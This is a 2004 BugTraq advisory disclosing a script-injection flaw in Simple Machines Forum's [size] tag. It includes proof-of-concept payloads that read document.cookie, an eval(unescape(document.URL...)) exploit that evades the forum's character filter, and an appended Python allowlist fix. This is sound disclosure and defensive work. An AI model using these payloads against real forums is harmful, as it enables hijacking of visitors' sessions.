BugTraq
SMF SIZE Tag Script Injection Vulnerability May 05 2004 12:28PM
Cheng Peng Su (apple_soup msn com)


############################################################################

Advisory Name : SMF SIZE Tag Script Injection Vulnerability

Release Date : May 3, 2004

Application : Simple Machines

Test On : SMF 1.0 Beta 5 Public

Vendor URL : http://www.simplemachines.org/

Discover : Cheng Peng Su(apple_soup_at_msn.com)

############################################################################

Intro:

The team that brought you YaBB SE has moved on to develop the next evolution in forum software, Simple Machines Forum (SMF). They have rebranded themselves under the name Simple Machines. They said proudly that "SMF is a next-generation community software package and is jam-packed with features, while at the same time having a minimal impact on resources."

Proof of concept:

SMF does not strictly filter scripting code in the [size] tag; in other words, the ( ) + characters are not filtered. An attacker can use the expression() syntax to place a malicious expression in the font-size attribute. The code below works:

[size=expression(alert(document.cookie))]Just beginning[/size]

But if you try more complex code, you will find that some characters (such as the quote, apostrophe and semicolon) are filtered by SMF. I found a working way that needs no quote, apostrophe or semicolon; you will see it in the Exploit below.

Exploit:

First, submit specially crafted content like the following:

[size=expression(eval(unescape(document.URL.substring(document.URL.length-41,document.URL.length))))]Big Exploit[/size]

'41' in the content is the length of the malicious script.

If the URL of the topic above is

http://site/index.php?topic=12345.0

make a link carrying the malicious script like this:

http://site/index.php?topic=12345.0&alert('Your cookie:\n'+document.cookie)

Solution:

SMF was notified and there may be a release of a fix or update to resolve this issue. Who knows, maybe they don't care about this bug.
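The forum-side fix is to validate the [size] value against an allowlist of plain sizes instead of stripping individual characters. The following Python is an added illustration and not SMF's code; the denylist function is a constructed stand-in for the character-stripping filter the advisory describes, not SMF's actual filter, and both are run on the advisory's own payload:

```python
import html
import re

# Constructed stand-in for a character-stripping filter like the one the
# advisory describes: quotes, apostrophes and semicolons go, ( ) + stay,
# so an expression() value passes through untouched.
def denylist_size(value: str) -> str:
    return re.sub(r"[\"';]", "", value)

# Allowlist: a [size] value is only ever a number, an optional decimal
# part and one of a few units. Anything else is rejected outright.
_SIZE_RE = re.compile(r"(\d{1,3})(?:\.(\d{1,2}))?(px|pt|em|%)?")

def allowlist_size(value: str):
    """Return a CSS font-size string, or None when the value is not a plain size."""
    m = _SIZE_RE.fullmatch(value.strip())
    if not m:
        return None
    whole, frac, unit = m.groups()
    size = float(f"{whole}.{frac or 0}")
    # Clamp so a user cannot request absurd sizes either.
    size = min(max(size, 1.0), 99.0)
    return f"{size:g}{unit or 'px'}"

_TAG_RE = re.compile(r"\[size=([^\]]*)\](.*?)\[/size\]", re.DOTALL)

def render_size_tags(bbcode: str) -> str:
    """Convert [size=...]...[/size] into a <span>; a rejected size leaves the tag as literal text."""
    def repl(m):
        css = allowlist_size(m.group(1))
        if css is None:
            return html.escape(m.group(0))  # show the raw tag, never emit it as CSS
        return f'<span style="font-size: {css}">{html.escape(m.group(2))}</span>'
    return _TAG_RE.sub(repl, bbcode)

if __name__ == "__main__":
    payload = "[size=expression(alert(document.cookie))]Just beginning[/size]"
    print("denylist keeps:", denylist_size("expression(alert(document.cookie))"))
    print("allowlist returns:", allowlist_size("expression(alert(document.cookie))"))
    print(render_size_tags(payload))
    print(render_size_tags("[size=14px]normal post[/size]"))
```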

Contact:

apple_soup_at_msn.com

Cheng Peng Su

Class 1, Senior 2, High school attached to Wuhan University

Wuhan, Hubei, China (430072)
